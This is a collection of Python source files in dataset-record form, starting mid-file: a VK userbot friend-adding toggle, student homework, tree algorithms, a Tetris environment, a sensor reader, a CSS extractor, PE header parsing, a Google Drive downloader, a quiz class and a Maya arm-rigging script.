{e.error_code} {e.error_msg} {e.request_params}')\r\n time.sleep(5)\r\n is_stop = stop()\r\n if is_stop: break\r\n except Exception as e:\r\n logger.info(f\"Ошибка в AFA: {e}\")\r\n time.sleep(300)\r\n\r\n\r\n@dp.my_signal_event_handle('-адвд', '-друзья')\r\ndef off_afa(event: MySignalEvent):\r\n global afa_thread\r\n global stop_thread\r\n\r\n logger.info(\"Выключено автодобавление в друзья\")\r\n\r\n if afa_thread == None or not afa_thread.is_alive():\r\n utils.new_message(event.api, event.chat.peer_id, message=\"❗ Автодобавление в друзья не запущено\")\r\n return \"ok\"\r\n set_afa(False)\r\n utils.new_message(event.api, event.chat.peer_id, message=\"✅ Автодобавление в друзья остановлено.\")\r\n return \"ok\"\r\n\r\n\r\n@dp.my_signal_event_handle('+адвд', '+друзья')\r\ndef on_afa(event: MySignalEvent):\r\n global afa_thread\r\n global stop_thread\r\n\r\n logger.info(\"Установлен онлайн\")\r\n\r\n stop_thread = False\r\n if afa_thread != None and afa_thread.is_alive():\r\n utils.new_message(event.api, event.chat.peer_id, message=\"✅ Автодобавление в друзья и так запущено.\")\r\n return \"ok\"\r\n set_afa(True)\r\n utils.new_message(event.api, event.chat.peer_id, message=\"✅ Автодобавление в друзья запущено.\")\r\n return \"ok\"\r\n\r\n\r\n@dp.my_signal_event_handle('адвд', 'друзья')\r\ndef check_afa(event: MySignalEvent):\r\n global afa_thread\r\n if afa_thread != None and afa_thread.is_alive():\r\n utils.new_message(event.api, event.chat.peer_id, message=\"✅ Автодобавление в друзья работает.\")\r\n return \"ok\"\r\n else:\r\n utils.new_message(event.api, event.chat.peer_id, message=\"✅ Автодобавление в друзья не работает.\")\r\n return \"ok\"\r\n","repo_name":"dutydev/IDM","sub_path":"idm/commands/my_signals/auto_friends_add.py","file_name":"auto_friends_add.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"ru","doc_type":"code","stars":19,"dataset":"github-code","pt":"78"} +{"seq_id":"72675252732","text":"\n# Task 1. Files\n# Write a script that creates a new output file called myfile.txt and writes the string \"Hello file world!\" in it.\n# Then write another script that opens myfile.txt, and reads and prints its contents.\n# Run your two scripts from the system command line.\n# Does the new file show up in the directory where you ran your scripts?\n# What if you add a different directory path to the filename passed to open?\n# Note: file write methods do not add newline characters to your strings;\n# add an explicit ‘\\n’ at the end of the string if you want to fully terminate the line in the file.\n\nimport os\nimport shutil\n\nmy_file = open('myfile.txt', 'w+')\nmy_file.write('Hello file world!')\nmy_file.close()\nmy_file = open('myfile.txt')\nmy_file.read()\nmy_file = open('myfile.txt')\nshutil.move('myfile.txt', 'new_myfile')\n\n\n# Task 2. Extend Phonebook application\n# Functionality of Phonebook application:\n# Add new entries\n# Search by first name\n# Search by last name\n# Search by full name\n# Search by telephone number\n# Search by city or state\n# Delete a record for a given telephone number\n# Update a record for a given telephone number\n# An option to exit the program\n#\n# The first argument to the application should be the name of the phonebook. Application should load JSON data,\n# if it is present in the folder with application, else raise an error.\n# After the user exits, all data should be saved to loaded JSON.\n\nimport json\n\ndef print_contacts(all_contacts):\n for i in all_contacts:\n print(i['name'], i['phone'], i['initials'], i['city'], i['country'], sep='\\n')\n\n\ndef creating_contact(new_contacts):\n new_contact = dict(phone='-', name='-', last_name='-', initials='-', city='-', country='-')\n new_contact['phone'] = input('Input phone number')\n new_contact['name'] = input('Input name')\n new_contact['last_name'] = input('Input last_name')\n initial_n = new_contact.get('name')\n initial_ln = new_contact.get('last_name')\n new_contact['initials'] = initial_n[0] + initial_ln[0]\n new_contact['city'] = input('Input city')\n new_contact['country'] = input('Input country')\n new_contacts.append(new_contact)\n adding_contact(new_contact)\n return new_contact\n\ndef adding_contact(add_new_contact):\n phonebook_file = open('Phonebook.json', 'w+')\n phonebook_file.write()\n phonebook_file.close()\n\ndef searching_contact_name(search_contact):\n f = True\n name_id = input('Input name:')\n for i in new_contact:\n if new_contact.get('name').upper() == name_id.upper():\n print(new_contact.get('phone'), new_contact.get('name'), new_contact.get('initials'),\n new_contact.get('city'), new_contact.get('country'))\n f = False\n if f:\n print('Required contact did not found')\n\ndef searching_contact_phone():\n f = True\n phone_id = input('Input phone:')\n for i in new_contact:\n if new_contact.get('phone') == phone_id:\n print(new_contact.get('phone'), new_contact.get('name'), new_contact.get('initials'),\n new_contact.get('city'), new_contact.get('country'))\n f = False\n if f:\n print('Required contact did not found')\n\ndef delete_contact():\n f = True\n name_id = input('Input name:')\n for i in new_contact:\n if new_contact.get('name').upper() == name_id.upper():\n new_contact.pop('name')\n f = False\n if f:\n print('Required contact did not found')\n\n\n\n\n\n\n\n","repo_name":"BVBohdan/Homework","sub_path":"lsn10.py","file_name":"lsn10.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8255227440","text":"class tree():\n def __init__(self, root, left = None, right = None):\n self.root = root\n self.left = left\n self.right = right\n\ndef node_value(node):\n return node.root\n\n# reference: http://www.geeksforgeeks.org/diameter-of-a-binary-tree/\ndef height(tree):\n # base case when tree is empty, then height is 0\n if tree == None:\n return 0\n # tree height is max(left sub-tree height, right sub-tree height) plus 1\n h_l = height(tree.left)\n h_r = height(tree.right)\n return max(h_l, h_r) + 1\n\n# diameter (the longest path between two leaf nodes) could be formed by nodes through the root node or not, thus diameter is generated from the larget of the three:\n# 1. if through the root, heigh of left sub-tree + height of right sub-tree + 1\n# 2. if not through the root, left sub-tree diameter or right sub-tree diameter\ndef diameter(tree):\n # Base Case when tree is empty \n if tree == None:\n return 0\n # Get the height of left and right sub-trees\n h_left = height(tree.left)\n h_right = height(tree.right)\n # Get the diameter of left and irgh sub-trees\n d_left = diameter(tree.left)\n d_right = diameter(tree.right)\n # Return max of the following:\n # 1) Diameter of left subtree\n # 2) Diameter of right subtree\n # 3) Height of left subtree + height of right subtree +1\n return max(d_left, d_right, h_left+h_right+1)\n\n# a more condense way to return diameter and height and in one recursive function \ndef longestPath(n):\n # base case when tree is empty, so that diameter, height as 0, 0\n if n == None:\n return 0, 0\n # get the (diameter, height) of left and right sub-tree\n left_longest, l_height = longestPath(n.left)\n right_longest, r_height = longestPath(n.right)\n # diameter is the larget among left sub-tree diameter, right sub-tree diamater, and left sub-tree height+right sub-tree height+1, while height is max(left sub-tree height, right sub-tree height) + 1\n return max(left_longest, right_longest, l_height+r_height + 1), max(l_height, r_height) + 1\n \nsub_tree_l = tree('B', tree('D'))\nsub_tree_r = tree('C', tree('E'), tree('F'))\nT = tree('A', sub_tree_l, sub_tree_r)\n\nprint(longestPath(T))\nprint(diameter(T))\n","repo_name":"smallfishxz/Practice_Algorithm","sub_path":"Tree/Diameter_longest_path.py","file_name":"Diameter_longest_path.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27795704863","text":"import pygame\nimport time\nimport settings as s\nimport arena\nimport random\n\nclass Tetris:\n def __init__(self):\n self.renders = False\n if self.renders:\n pygame.init()\n pygame.display.set_caption(\"tetris\")\n self.screen = pygame.display.set_mode(s.screen_size)\n\n self.main_arena = arena.Arena(s.arena_size, renders=self.renders)\n self.steps = 0\n self.score = 0\n self.merge_delay = 5\n self.merge_counter = 0\n self.episode = 0\n\n\n def sample(self):\n random_value = random.randint(0, 3)\n return random_value\n\n def reset(self):\n self.episode += 1\n self.main_arena = arena.Arena(s.arena_size, self.renders)\n self.steps = 0\n self.score = 0\n self.merge_delay = 5\n self.merge_counter = 0\n return self.main_arena.state()\n\n def select_action(self):\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n return 3\n if event.key == pygame.K_RIGHT:\n return 0\n if event.key == pygame.K_LEFT:\n return 1\n if event.key == pygame.K_DOWN:\n return 2\n\n def step(self, action):\n start_score = self.main_arena.score\n\n self.main_arena.update_moving_blocks()\n self.main_arena.check_block_merge()\n\n\n self.steps += 1\n self.merge_counter += 1\n if action == 0:\n self.main_arena.move_block_right()\n if action == 1:\n self.main_arena.move_block_left()\n if action == 3:\n self.main_arena.rotate_block()\n if action == 2:\n self.main_arena.place_block()\n\n reward = self.main_arena.score - start_score - self.main_arena.bumpyness()//2 - self.main_arena.aggregate_height()//5 + self.steps//2\n\n if self.renders and self.episode % self.episode == 10 :\n self.render()\n\n return self.main_arena.state(), reward, self.main_arena.running, None\n\n\n\n def render(self):\n self.main_arena.render(self.screen)\n pygame.display.flip()\n\ndef main():\n pygame.init()\n pygame.display.set_caption(\"tetris\")\n screen = pygame.display.set_mode(s.screen_size)\n running = True\n step = 0\n score = 0\n merge_delay = 20\n merge_counter = 0\n\n main_arena = arena.Arena(s.arena_size, renders=True)\n while running:\n if step % 10 == 0:\n if main_arena.update_moving_blocks():\n merge_counter = 0\n if merge_counter > merge_delay:\n main_arena.check_block_merge()\n merge_counter = 0\n time.sleep(0.03)\n main_arena.render(screen)\n pygame.display.flip()\n screen.fill((220, 220, 220))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n main_arena.rotate_block()\n if event.key == pygame.K_RIGHT:\n main_arena.move_block_right()\n if event.key == pygame.K_LEFT:\n main_arena.move_block_left()\n if event.key == pygame.K_DOWN:\n main_arena.place_block()\n if event.key == pygame.K_0:\n pass\n # main_arena.add_moving_block()\n step += 1\n merge_counter += 1\n running = main_arena.running\n\nif __name__ == '__main__':\n main()","repo_name":"Joeydelarago/tetrisneuralnetwork","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17490758578","text":"import smbus\nimport time\n\n# If you're using SDA1+SCL1, set this to 1\n# If you're using SDA0+SCL0, set this to 0\nport = 1\nbus = smbus.SMBus(port)\ndevice_address = 0x5a\n\ntry:\n # to read the object temperature, pass in 0x07\n # to read the ambient temperature, pass in 0x06\n reading = bus.read_word_data(device_address, 0x07)\n tempc = reading * .02 - 273.15\n tempf = (tempc * 9.0 / 5.0) + 32.0\n print(tempf)\nexcept IOError:\n print(\"error\")","repo_name":"locofocos/wood-stove-rails","sub_path":"lib/read_temp.py","file_name":"read_temp.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21512658352","text":"#!/usr/bin/python\n\nimport tinycss\nimport sys\nimport re\nimport json\n\n\ndef get_end_line(line_number):\n\tcss_file_as_lines = css_file.splitlines()\n\topen_brackets = 0\n\twhile line_number <= len(css_file_as_lines):\n\t\topen_brackets += len(re.findall(\"{\", css_file_as_lines[line_number - 1]))\n\t\topen_brackets -= len(re.findall(\"}\", css_file_as_lines[line_number - 1]))\n\t\tif open_brackets == 0:\n\t\t\treturn line_number\n\t\tif open_brackets < 0:\n\t\t\tprint(\"Parsing Error: In get_end_line()\")\n\t\tline_number += 1\n\n\nparser = tinycss.make_parser('page3')\ncss_file = sys.stdin.read()\nstylesheet = parser.parse_stylesheet_bytes(css_file)\n\nfragments = {'fragments': []}\nfor rule in stylesheet.rules:\n\tfragments['fragments'].append(\n\t\t{'name': str(rule.selector.as_css()), 'startLine': rule.line, 'endLine': get_end_line(rule.line),\n\t\t 'fragments': [], 'classifier': 'rule'})\n\tfor declaration in rule.declarations:\n\t\tparent = fragments['fragments'][len(fragments['fragments']) - 1]\n\t\tparent['fragments'].append({'name': declaration.name, 'startLine': declaration.line, 'endLine': declaration.line,\n\t\t 'fragments': [], 'classifier': 'declaration', 'value': str(declaration.value.as_css())})\n\nprint(json.dumps(fragments, indent=2))","repo_name":"101companies/101repo","sub_path":"technologies/CSSFactExtractor/extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"78"} +{"seq_id":"73816731453","text":"from struct import Struct, unpack\nfrom collections import namedtuple\n\n\nclass PEStructs:\n _IMAGE_FILE_HEADER = namedtuple('_IMAGE_FILE_HEADER',\n ('Machine',\n 'NumberOfSections',\n 'TimeDateStamp',\n 'PointerToSymbolTable',\n 'NumberOfSymbols',\n 'SizeOfOptionalHeader',\n 'Characteristics'))\n @classmethod\n def read_image_file_header(cls, file):\n format = Struct(' c1)\r\n\r\nprint(c1.name, c1.age)\r\nprint(c2.name, c2.age)\r\n\r\nif c1.compare(c2): # compare(self = c1, c2)\r\n pass\r\n","repo_name":"danishkhanbx/Everything-in-Python","sub_path":"Constructor & self.py","file_name":"Constructor & self.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"4664919349","text":"# Selenium stuff should go in here too\nfrom pathlib import Path\n\n\n# Class adapted from https://github.com/ndrplz/google-drive-downloader/blob/master/google_drive_downloader/google_drive_downloader.py\nclass GoogleDriveHandler:\n\t\"\"\" Google Drive interface. \"\"\"\n\n\tCHUNK_SIZE = 32768\n\tDOWNLOAD_URL = 'https://docs.google.com/uc?export=download'\n\n\t@classmethod\n\tdef download_file(cls, file_id, dest_path):\n\t\t\"\"\" Download a file from Google Drive. \"\"\"\n\t\ttry:\n\t\t\timport requests\n\t\texcept ImportError as e:\n\t\t\traise ImportError(\n\t\t\t\t\"This function requires the requests library.\"\n\t\t\t\t\"Please install it using `pip install requests`.\"\n\t\t\t) from e\n\n\t\tdest_path = Path(dest_path)\n\t\tdest_path.parent.mkdir(parents=True, exist_ok=True)\n\n\t\tsession = requests.Session()\n\n\t\tprint(f\"Downloading {file_id} into {dest_path} ... \", end=\"\", flush=True)\n\n\t\tresponse = session.get(cls.DOWNLOAD_URL, params={'id': file_id}, stream=True)\n\n\t\ttoken = cls._get_confirm_token(response)\n\t\tif token:\n\t\t\tparams = {'id': file_id, 'confirm': token}\n\t\t\tresponse = session.get(cls.DOWNLOAD_URL, params=params, stream=True)\n\n\t\tcls._save_response_content(response, dest_path)\n\t\tprint('Done.')\n\n\t@staticmethod\n\tdef _get_confirm_token(response):\n\t\tfor key, value in response.cookies.items():\n\t\t\tif key.startswith('download_warning'):\n\t\t\t\treturn value\n\t\treturn None\n\n\t@classmethod\n\tdef _save_response_content(cls, response, destination):\n\t\twith open(destination, 'wb') as f:\n\t\t\tfor chunk in response.iter_content(cls.CHUNK_SIZE):\n\t\t\t\tif chunk: # filter out keep-alive new chunks\n\t\t\t\t\tf.write(chunk)\n","repo_name":"MatejVitek/Python-Libraries","sub_path":"matej/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2069042445","text":"import random\nimport string\nfrom core.printer import Printer\nfrom core.actions import Action\nfrom core.question.question import Question\nfrom difflib import SequenceMatcher\n\n\nclass TypeWord(Question):\n def __init__(self, lines, index, num_options, num_shown_lines):\n super().__init__(lines, index)\n self.question_text = 'Type the missing word?'\n self.num_options = num_options\n self.num_shown_lines = num_shown_lines\n self.printer = Printer()\n self.answer = None\n self.options = []\n self.user_answer = None\n self.is_answered = False\n\n @property\n def start_line_index(self):\n return max(self.index - self.num_shown_lines, 0)\n\n @property\n def answered_correctly(self):\n s_answer = self.answer.translate(\n str.maketrans('', '', string.punctuation))\n s_user_answer = self.user_answer.translate(\n str.maketrans('', '', string.punctuation))\n accuracy = self.similar(s_answer.lower(), s_user_answer.lower())\n return accuracy > 0.9\n\n def similar(self, a, b):\n return SequenceMatcher(None, a, b).ratio()\n\n def longest_word(self, words):\n longest = ''\n for word in words:\n if len(word) > len(longest):\n longest = word\n return longest\n\n def average_word_length(self, words):\n return int(len(''.join(words)) / len(words))\n\n def print_question(self):\n for i in range(self.start_line_index, self.index):\n print('\\t' + self.lines[i])\n last_line = self.lines[self.index]\n space = int(self.average_word_length(last_line.split()) * 1.5)\n q_line = last_line.replace(self.answer, '▁' * space)\n print('\\t' + q_line)\n print(f'\\nQ: {self.question_text}', '\\n')\n\n def execute(self):\n '''Creates options from the given text then asks'''\n self.answer = random.choice(self.lines[self.index].split())\n\n def ask(self):\n '''Displays the question and asks for user answer'''\n self.print_question()\n\n action = Action.Invalid\n choice = input('\\nAnswer: ')\n\n if 'q' == choice:\n action = Action.Quit\n self.is_answered = True\n action = Action.Quit\n elif len(choice) > 0:\n self.is_answered = True\n self.user_answer = choice\n action = Action.Continue\n else:\n print('\\nInvalid option, please try again!\\n')\n\n return action\n","repo_name":"Pomb/memorite","sub_path":"lib/core/question/type_word.py","file_name":"type_word.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"34792386665","text":"#-*- coding:utf-8 -*-\nimport maya.cmds as cmds\nfrom TDModularRiggingSystem.lib import System as System\n\n#腕のリギング 【LR : 1=左、2=右】,【CtlColor : コントローラーの色】\nclass TDArmRigging():\n def __init__(self):\n #self.System.__init__()\n self.System = System.ModularRiggingSystem()\n self.ArmNull = []#腕ジョイントのオフセットノード\n self.armRotateAttr = {}#デフォルトの腕ジョイントの回転値\n\n \"-----コマンドの実行-----\"\n def setArmRigging(self,LR,CtlColor,switchCtlName,ArmAttrList):\n TDArmRigging.getDefaultRotateAttr(self,LR)\n #TDArmRigging.createArmNull(self,LR)\n TDArmRigging.createFKArmJoint(self,LR,CtlColor)\n TDArmRigging.createIKArmJoint(self,LR,CtlColor)\n self.IKArmCtlList = TDArmRigging.createIKArmCtl(self,LR,CtlColor)\n TDArmRigging.createIKForeArmCtl(self,LR,CtlColor)\n TDArmRigging.createIKShoulderCtl(self,LR,CtlColor)\n TDArmRigging.createFKArmCtl(self,CtlColor)\n TDArmRigging.createIKArmExpression(self,LR,switchCtlName)\n self.ArmGrpList = TDArmRigging.setArmCtlLayering(self)\n TDArmRigging.setDefaultRotateAttr(self,LR)\n TDArmRigging.connectArmSwitch(self,LR,ArmAttrList)\n #TDArmRigging.addArmCtlClass(self,LR)\n\n return [self.IKArmCtlList, self.ArmGrpList]\n\n #デフォルトの回転値を保持し腕ジョイントをTポーズに戻す\n def getDefaultRotateAttr(self,LR):\n for armDRA in self.System.getBetweenJoint(self.System.getJointLabelType()[LR,9],self.System.getJointLabelType()[LR,12]):\n self.armRotateAttr[armDRA] = self.System.getJointRotate()[armDRA]\n cmds.setAttr(armDRA+\".rotate\",0,0,0)\n\n #腕ジョイントのオフセットノードを作成\n def createArmNull(self,LR):\n for armNulls in self.getBetweenJoint(self.getJointLabelType()[LR,9],self.getJointLabelType()[LR,12]):\n self.armNullGP = self.createGP(armNulls,\"%s_Offset\"%armNulls)\n self.ArmNull.append(self.armNullGP)\n\n #FKジョイントを作成\n def createFKArmJoint(self,LR,CtlColor):\n self.FKArmJoint = []\n if LR == 1:self.LeftRight = [\"Left\"]\n elif LR == 2:self.LeftRight = [\"Right\"]\n self.dupArmJointList = self.System.dupRenameJoint(self.System.getJointLabelType()[LR,9],\"FK\")\n for dupArmJointLists in reversed(self.dupArmJointList):\n if dupArmJointLists == \"FK\" + self.System.getJointLabelType()[LR,12]:\n cmds.parent(dupArmJointLists,self.System.getJointLabelType()[LR,9])\n self.FKArmJoint.append(dupArmJointLists)\n elif dupArmJointLists == \"FK\" + self.System.getJointLabelType()[LR,11]:\n cmds.parent(dupArmJointLists,self.System.getJointLabelType()[LR,9])\n self.FKArmJoint.append(dupArmJointLists)\n elif dupArmJointLists == \"FK\" + self.System.getJointLabelType()[LR,10]:\n self.FKArmJoint.append(dupArmJointLists)\n elif dupArmJointLists == \"FK\" + self.System.getJointLabelType()[LR,9]:\n self.FKArmJoint.append(dupArmJointLists)\n else:cmds.delete(dupArmJointLists)\n #reversed(self.FKArmJoint)\n cmds.parent(self.FKArmJoint[0],self.FKArmJoint[1])\n cmds.parent(self.FKArmJoint[1],self.FKArmJoint[2])\n\n self.FKArmJointOC = cmds.orientConstraint(self.FKArmJoint[2],self.System.getJointLabelType()[LR,10],w=0,mo=True)\n self.FKForeArmJointOC = cmds.orientConstraint(self.FKArmJoint[1],self.System.getJointLabelType()[LR,11],w=0,mo=True)\n if LR == 1:\n self.FKHandJointOC = cmds.orientConstraint(self.FKArmJoint[0],self.System.getJointLabelType()[LR,12],w=0,mo=True)\n elif LR == 2:\n self.FKHandJointOC = cmds.orientConstraint(self.FKArmJoint[0],self.System.getJointLabelType()[LR,12],w=0,o=[180,0,0])\n self.FKShoulderJOffGP = self.System.createGP(self.FKArmJoint[-1],\"%s_Offset\"%self.FKArmJoint[-1])\n cmds.parent(self.FKShoulderJOffGP,w=True)\n #cmds.setAttr(self.FKArmOffGP+\".visibility\",0)\n\n \"\"\"\n self.FKJoint = []#FKジョイントを取得\n if LR == 1:self.LeftRight = [\"Left\"]\n elif LR == 2:self.LeftRight = [\"Right\"]\n cmds.select(self.getJointLabelType()[LR,9])\n\n self.FKArmJ = cmds.joint(r=True,p=self.getJointWPosition(self.getJointLabelType()[LR,10]),n=\"FK%s\"%self.getJointLabelType()[LR,10])\n self.FKForeArmJ = cmds.joint(r=True,p=self.getJointWPosition(self.getJointLabelType()[LR,11]),n=\"FK%s\"%self.getJointLabelType()[LR,11])\n #cmds.setAttr(self.FKForeArmJ+\".preferredAngleY\",-90)\n self.pc = cmds.pointConstraint(self.getJointLabelType()[LR,11],self.FKForeArmJ)\n cmds.delete(self.pc)\n self.FKHandJ = cmds.joint(r=True,p=self.getJointWPosition(self.getJointLabelType()[LR,12]),n=\"FK%s\"%self.getJointLabelType()[LR,12])\n self.pc = cmds.pointConstraint(self.getJointLabelType()[LR,12],self.FKHandJ)\n cmds.delete(self.pc)\n self.FKArmJointOC = cmds.orientConstraint(self.FKArmJ,self.getJointLabelType()[LR,10],w=0,mo=True)\n self.FKForeArmJointOC = cmds.orientConstraint(self.FKForeArmJ,self.getJointLabelType()[LR,11],w=0,mo=True)\n self.FKHandJointOC = cmds.orientConstraint(self.FKHandJ,self.getJointLabelType()[LR,12],w=0,mo=True)\n self.FKArmOffGP = self.createGP(self.FKArmJ,\"%s_Offset\"%self.FKArmJ)\n cmds.setAttr(self.FKArmOffGP+\".visibility\",0)\n \"\"\"\n\n #IKジョイントを作成\n def createIKArmJoint(self,LR,CtlColor):\n cmds.select(self.System.getJointLabelType()[LR,9])\n self.IKArmJ = cmds.joint(r=True,p=self.System.getJointWPosition(self.System.getJointLabelType()[LR,10]),n=\"IK%s\"%self.System.getJointLabelType()[LR,10])\n self.IKForeArmJ = cmds.joint(r=True,p=self.System.getJointWPosition(self.System.getJointLabelType()[LR,11]),n=\"IK%s\"%self.System.getJointLabelType()[LR,11])\n cmds.setAttr(self.IKForeArmJ+\".preferredAngleY\",-90)\n self.pc = cmds.pointConstraint(self.System.getJointLabelType()[LR,11],self.IKForeArmJ)\n cmds.delete(self.pc)\n self.IKHandJ = cmds.joint(r=True,p=self.System.getJointWPosition(self.System.getJointLabelType()[LR,12]),n=\"IK%s\"%self.System.getJointLabelType()[LR,12])\n self.pc = cmds.pointConstraint(self.System.getJointLabelType()[LR,12],self.IKHandJ)\n cmds.delete(self.pc)\n self.IKArmJointOC = cmds.orientConstraint(self.IKArmJ,self.System.getJointLabelType()[LR,10],mo=True)\n self.IKForeArmJointOC = cmds.orientConstraint(self.IKForeArmJ,self.System.getJointLabelType()[LR,11],mo=True)\n if LR == 1:\n self.IKHandJointOC = cmds.orientConstraint(self.IKHandJ,self.System.getJointLabelType()[LR,12],mo=True)\n elif LR == 2:\n self.IKHandJointOC = cmds.orientConstraint(self.IKHandJ,self.System.getJointLabelType()[LR,12],o=[180,0,0])\n self.IKArmOffGP = self.System.createGP(self.IKArmJ,\"%s_Offset\"%self.IKArmJ)\n cmds.parentConstraint(self.System.getJointLabelType()[LR,9],self.IKArmOffGP,mo=True)\n cmds.setAttr(self.IKArmOffGP+\".visibility\",0)\n\n #IKのコントローラーの作成\n def createIKArmCtl(self,LR,CtlColor):\n self.armIK = cmds.ikHandle(sj = self.IKArmJ,ee = self.IKHandJ,\n sol=\"ikRPsolver\",name=\"%s_ikHandle\"%self.System.getJointLabelType()[LR,12])\n self.armIKGP = self.System.createGP(self.armIK[0],\"%s_GP\"%self.armIK[0])\n cmds.setAttr(self.armIKGP+\".visibility\",0)\n #IKの手のコントローラー\n self.IKArmCtl = self.System.createRigController(self.System.TDcrc.TDCube,self.IKHandJ,self.System.getJointLabelType()[LR,12],CtlColor,15)\n self.IKArmCtlPC = cmds.pointConstraint(self.IKArmCtl,self.System.gp)\n self.IKArmCtlOC = cmds.orientConstraint(self.IKArmCtl,self.IKHandJ,mo=True)\n self.IKArmCtlBlend = self.System.createGP(self.IKArmCtl,\"%s_Blend\"%self.IKArmCtl)\n\n return self.armIKGP\n\n #IKの肘のコントローラー\n def createIKForeArmCtl(self,LR,CtlColor):\n self.IKForeArmCtl = self.System.createRigController(self.System.TDcrc.TDsphere,self.IKForeArmJ,self.System.getJointLabelType()[LR,9],CtlColor,1)\n self.getPivot = cmds.xform(self.System.getJointLabelType()[LR,11],q=True,ws=True,rp=True)\n cmds.xform(self.IKForeArmCtl,ws=True,piv = self.getPivot)\n if LR == 1:cmds.setAttr(self.IKForeArmCtl+\".rotateY\",-90)\n else:cmds.setAttr(self.IKForeArmCtl+\".rotateY\",90)\n cmds.makeIdentity(self.IKForeArmCtl,apply=True,t=1,r=1,s=1)\n cmds.xform(self.IKForeArmCtl,cp=True)\n cmds.poleVectorConstraint(self.IKForeArmCtl,self.armIK[0],w=1)\n self.IKForeArmCtlBlend = self.System.createGP(self.IKForeArmCtl,\"%s_Blend\"%self.IKForeArmCtl)\n #cmds.aimConstraint(self.getJointLabelType()[LR,11],self.IKForeArmCtl,o=[0,90,0])\n\n #IKの鎖骨のコントローラー\n def createIKShoulderCtl(self,LR,CtlColor):\n self.shoulderCtl = self.System.createRigController(self.System.TDcrc.TDCircle,self.System.getJointLabelType()[LR,9],self.System.getJointLabelType()[LR,9],CtlColor,15)\n if LR == 1:\n cmds.setAttr(self.shoulderCtl+\".rotateZ\",70)\n else:\n cmds.setAttr(self.shoulderCtl+\".rotateZ\",-70)\n cmds.makeIdentity(self.shoulderCtl,apply=True,t=1,r=1,s=1)\n self.shoulderCtlpp = cmds.parentConstraint(self.shoulderCtl,self.System.getJointLabelType()[LR,9],mo=True)\n self.shoulderCtlOffset = self.System.createGP(self.shoulderCtl,\"%s_Offset\"%self.shoulderCtl)\n\n #FKのコントローラーを作成\n def createFKArmCtl(self,CtlColor):\n \"鎖骨のコントローラー\"\n cmds.parent(self.shoulderCtlOffset,self.FKArmJoint[-1])\n cmds.makeIdentity(self.shoulderCtlOffset,apply=True,r=1)\n \"肩のコントローラー\"\n self.FKArmCtl = self.System.createRigController(self.System.TDcrc.TDCircle,self.FKArmJoint[2],self.FKArmJoint[2],CtlColor,15)\n cmds.setAttr(self.FKArmCtl+\".rotateZ\",90)\n cmds.makeIdentity(self.FKArmCtl,apply=True,t=1,r=1,s=1)\n self.FKArmCtlBlend = self.System.createGP(self.FKArmCtl,\"%s_Offset\"%self.FKArmCtl)\n\n cmds.parent(self.FKArmCtlBlend,self.shoulderCtl)\n cmds.makeIdentity(self.FKArmCtlBlend,apply=True,r=1)\n\n self.FKArmJointRotate = self.System.createGP(self.FKArmCtlBlend,\"%s_ArmJointRotate\"%self.FKArmCtlBlend)\n self.FKArmGP = cmds.group(self.FKArmJointRotate,name=\"FK%sArm_GP\"%self.LeftRight[0])\n\n cmds.parent(self.FKArmJoint[2],self.FKArmCtl)\n cmds.makeIdentity(self.FKArmCtl,apply=True,r=1)\n #self.FKArmCtlop = cmds.orientConstraint(self.FKArmCtl,self.FKArmJoint[2],mo=True)\n \"肘のコントローラー\"\n self.FKForeArmCtl = self.System.createRigController(self.System.TDcrc.TDCircle,self.FKArmJoint[1],self.FKArmJoint[1],CtlColor,15)\n cmds.setAttr(self.FKForeArmCtl+\".rotateZ\",90)\n cmds.makeIdentity(self.FKForeArmCtl,apply=True,t=1,r=1,s=1)\n self.FKForeArmCtlBlend = self.System.createGP(self.FKForeArmCtl,\"%s_Offset\"%self.FKForeArmCtl)\n\n cmds.parent(self.FKForeArmCtlBlend,self.FKArmJoint[2])\n cmds.makeIdentity(self.FKForeArmCtlBlend,apply=True,r=1)\n cmds.parent(self.FKArmJoint[1],self.FKForeArmCtl)\n #self.FKForeArmCtlop = cmds.orientConstraint(self.FKForeArmCtl,self.FKArmJoint[1],mo=True)\n \"手のコントローラー\"\n self.FKHandCtl = self.System.createRigController(self.System.TDcrc.TDCircle,self.FKArmJoint[0],self.FKArmJoint[0],CtlColor,15)\n self.IKArmCtlOCAttr = cmds.getAttr(self.IKArmCtlOC[0]+\".offset\")\n cmds.setAttr(self.FKHandCtl+\".rotateZ\",90)\n self.FKHandCtlBlend = self.System.createGP(self.FKHandCtl,\"%s_Offset\"%self.FKHandCtl)\n\n cmds.parent(self.FKHandCtlBlend,self.FKArmJoint[1])\n cmds.makeIdentity(self.FKHandCtl,apply=True,t=1,r=1,s=1)\n cmds.parent(self.FKArmJoint[0],self.FKHandCtl)\n #cmds.makeIdentity(self.FKHandCtl,apply=True,r=1)\n #self.FKHandCtlop = cmds.orientConstraint(self.FKHandCtl,self.FKArmJoint[0],o=self.IKArmCtlOCAttr[0])\n \"オフセットヌルの作成\"\n cmds.makeIdentity(self.FKArmCtl,apply=True,r=1)\n\n \"FKジョイントとコントローラーの階層化\"\n\n \"手首FKのワールド回転値を保持するロケータ\"\n self.FKHandRotLoc = 